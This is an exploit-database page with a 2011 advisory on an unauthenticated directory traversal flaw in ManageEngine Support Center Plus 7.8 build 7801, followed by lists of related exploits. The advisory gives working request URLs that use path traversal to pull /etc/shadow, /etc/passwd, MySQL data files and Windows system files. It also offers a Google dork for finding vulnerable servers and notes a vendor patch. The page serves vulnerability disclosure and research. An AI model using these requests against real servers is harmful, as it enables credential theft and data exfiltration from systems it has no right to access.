Menu

Search for hundreds of thousands of exploits

"ManageEngine Support Center Plus 7.8 Build 7801 - Directory Traversal"

Author

Exploit author

xistence

Platform

Exploit platform

jsp

Release date

Exploit published date

2011-06-23

Download file

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
Advisory:
ManageEngine Support Center Plus 7.8 build <= 7801 Directory Traversal Vulnerability

Author:
Robert 'xistence' van Hamburg - xistence<AT>0x90.nl

Software link:
http://www.manageengine.com/products/support-center/download.html

Tested on:
Linux & Windows

Category:
Directory Traversal

Severity:
High

Google Dork: intitle:ManageEngine SupportCenter Plus

Description:

It's possible to access all local files on the server and because Support Center Plus runs as root/Administrator by default it's possible to access files owned by superusers too.
This for example makes it possible to grab for the "/etc/shadow" file on a linux box.
An authenticated user on the helpdesk is not needed, so any attacker can exploit this vulnerability without credentials.

Requests Linux:

Grab the /etc/passwd & /etc/shadow:

http://<SUPPORTCENTERURL>/workorder/FileDownload.jsp?FILENAME=passwd&module=Request&ID=1&path=..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd&delete=false
http://<SUPPORTCENTERURL>/workorder/FileDownload.jsp?FILENAME=shadow&module=Request&ID=1&path=..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fshadow&delete=false

In a default situation the databasename is "supportcenter" and so it's easy to retrieve the database files like this:

http://<SUPPORTCENTERURL>/workorder/FileDownload.jsp?FILENAME=ibdata1&module=Request&ID=1&path=..%2Fmysql%2Fdata%2Fibdata1&delete=false
http://<SUPPORTCENTERURL>/workorder/FileDownload.jsp?FILENAME=ib_logfile0&module=Request&ID=1&path=..%2Fmysql%2Fdata%2Fib_logfile0&delete=false
http://<SUPPORTCENTERURL>/workorder/FileDownload.jsp?FILENAME=ib_logfile1&module=Request&ID=1&path=..%2Fmysql%2Fdata%2Fib_logfile1&delete=false

http://<SUPPORTCENTERURL>/workorder/FileDownload.jsp?FILENAME=aaapassword.frm&module=Request&ID=1&path=..%2Fmysql%2Fdata%2Fsupportcenter%2Faaapassword.frm&delete=false
http://<SUPPORTCENTERURL>/workorder/FileDownload.jsp?FILENAME=aaauser.frm&module=Request&ID=1&path=..%2Fmysql%2Fdata%2Fsupportcenter%2Faaauser.frm&delete=false


Requests Windows:

Hosts file:
http://<SUPPORTCENTERURL>/workorder/FileDownload.jsp?FILENAME=hosts&module=Request&ID=1&path=..\..\..\..\..\..\Windows\system32\drivers\etc\hosts&delete=false

Explorer.exe:
http://<SUPPORTCENTERURL>/workorder/FileDownload.jsp?FILENAME=explorer.exe&module=Request&ID=1&path=..\..\..\..\..\..\Windows\explorer.exe&delete=false

MySQL database ibdata1 file:
http://<SUPPORTCENTERURL>/workorder/FileDownload.jsp?FILENAME=ibdata1&module=Request&ID=1&path=..\..\mysql\data\ibdata1&delete=false


Disclosure:
- May 30 2011, vulnerability found
- May 30 2011, contacted vendor (ManageEngine) about security issues
- Jun 1 2011, vulnerability fixed by vendor (ManageEngine) and released as patch 7803
Release Date Title Type Platform Author
2020-12-02 "Mitel mitel-cs018 - Call Data Information Disclosure" remote linux "Andrea Intilangelo"
2020-12-02 "aSc TimeTables 2021.6.2 - Denial of Service (PoC)" local windows "Ismael Nava"
2020-12-02 "NewsLister - Authenticated Persistent Cross-Site Scripting" webapps multiple "Emre Aslan"
2020-12-02 "DotCMS 20.11 - Stored Cross-Site Scripting" webapps multiple "Hardik Solanki"
2020-12-02 "Ksix Zigbee Devices - Playback Protection Bypass (PoC)" remote multiple "Alejandro Vazquez Vazquez"
2020-12-02 "Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality" webapps php "Mufaddal Masalawala"
2020-12-02 "ChurchCRM 4.2.0 - CSV/Formula Injection" webapps multiple "Mufaddal Masalawala"
2020-12-02 "ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)" webapps multiple "Mufaddal Masalawala"
2020-12-02 "Artworks Gallery 1.0 - Arbitrary File Upload RCE (Authenticated) via Edit Profile" webapps multiple "Shahrukh Iqbal Mirza"
2020-12-02 "IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path" local windows "Manuel Alvarez"
Release Date Title Type Platform Author
2019-11-12 "Atlassian Confluence 6.15.1 - Directory Traversal (Metasploit)" webapps jsp max7253
2019-11-12 "Atlassian Confluence 6.15.1 - Directory Traversal" webapps jsp max7253
2019-09-16 "NetGain EM Plus 10.1.68 - Remote Command Execution" webapps jsp azams
2019-07-26 "Ahsay Backup 7.x - 8.1.1.50 - XML External Entity Injection" webapps jsp "Wietse Boonstra"
2019-07-26 "Ahsay Backup 7.x - 8.1.1.50 - Authenticated Arbitrary File Upload / Remote Code Execution" webapps jsp "Wietse Boonstra"
2019-07-26 "Ahsay Backup 7.x - 8.1.1.50 - Authenticated Arbitrary File Upload / Remote Code Execution (Metasploit)" webapps jsp "Wietse Boonstra"
2019-06-11 "Liferay Portal 7.1 CE GA=3 / SimpleCaptcha API - Cross-Site Scripting" webapps jsp "Valerio Brussani"
2019-06-05 "Zimbra < 8.8.11 - XML External Entity Injection / Server-Side Request Forgery" webapps jsp k8gege
2019-05-10 "dotCMS 5.1.1 - HTML Injection" webapps jsp "Ismail Tasdelen"
2019-03-11 "OpenKM 6.3.2 < 6.3.7 - Remote Command Execution (Metasploit)" webapps jsp AkkuS
Release Date Title Type Platform Author
2015-10-05 "ManageEngine ServiceDesk Plus 9.1 build 9110 - Directory Traversal" webapps jsp xistence
2015-09-14 "ManageEngine EventLog Analyzer < 10.6 build 10060 - SQL Execution" webapps multiple xistence
2015-09-14 "ManageEngine OpManager 11.5 - Multiple Vulnerabilities" webapps multiple xistence
2014-03-19 "Quantum vmPRO 3.1.2 - Local Privilege Escalation" local hardware xistence
2014-03-19 "Loadbalancer.org Enterprise VA 7.5.2 - Static SSH Key" remote unix xistence
2014-03-19 "Quantum DXi V1000 2.2.1 - Static SSH Key" remote unix xistence
2014-03-19 "Array Networks vxAG 9.2.0.34 and vAPV 8.3.2.17 - Multiple Vulnerabilities" webapps hardware xistence
2014-02-05 "Pandora Fms 5.0RC1 - Remote Command Injection" webapps php xistence
2014-01-29 "A10 Networks Loadbalancer - Directory Traversal" webapps hardware xistence
2014-01-29 "ManageEngine Support Center Plus 7916 - Directory Traversal" webapps php xistence
2013-10-04 "Aanval 7.1 build 70151 - Multiple Vulnerabilities" webapps php xistence
2013-09-20 "OpenEMR 4.1.1 Patch 14 - SQL Injection / Privilege Escalation / Remote Code Execution (Metasploit)" remote php xistence
2013-09-20 "Western Digital Arkeia < 10.0.10 - Remote Code Execution (Metasploit)" remote php xistence
2013-09-17 "OpenEMR 4.1.1 Patch 14 - Multiple Vulnerabilities" webapps php xistence
2013-09-17 "Western Digital Arkeia Appliance 10.0.10 - Multiple Vulnerabilities" webapps php xistence
2013-09-03 "TP-Link TD-W8951ND - Multiple Vulnerabilities" webapps hardware xistence
2013-07-25 "Alienvault Open Source SIEM (OSSIM) - Multiple Cross-Site Scripting Vulnerabilities" webapps php xistence
2013-06-26 "Motion - Multiple Vulnerabilities" remote multiple xistence
2013-01-02 "Astium VoIP PBX 2.1 build 25399 - Multiple Vulnerabilities/Remote Command Execution" webapps php xistence
2013-01-02 "Astium VoIP PBX 2.1 build 25399 - Remote Crash (PoC)" dos linux xistence
2012-12-29 "Ubiquiti AirOS 5.5.2 - (Authenticated) Remote Command Execution" remote hardware xistence
2012-12-21 "YeaLink IP Phone SIP-TxxP Firmware 9.70.0.100 - Multiple Vulnerabilities" webapps hardware xistence
2012-10-19 "ManageEngine Security Manager Plus 5.5 build 5505 - Directory Traversal" webapps multiple xistence
2012-10-19 "ManageEngine Security Manager Plus 5.5 build 5505 - Remote Root/SYSTEM SQL Injection" remote multiple xistence
2012-10-19 "ManageEngine Security Manager Plus 5.5 build 5505 - Remote SYSTEM SQL Injection (Metasploit)" remote windows xistence
2012-10-17 "ManageEngine Support Center Plus 7908 - Multiple Vulnerabilities" webapps jsp xistence
2012-04-15 "ManageEngine Support Center Plus 7903 - Multiple Vulnerabilities" webapps multiple xistence
2011-06-23 "ManageEngine Support Center Plus 7.8 Build 7801 - Directory Traversal" webapps jsp xistence 
import requests
response = requests.get('http://127.0.0.1:8181?format=json')

For full documentation follow the link above

Cipherscan. Find out which SSL ciphersuites are supported by a target.

Cipher Protocols Sigalg Trusted

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.

Host WAF detected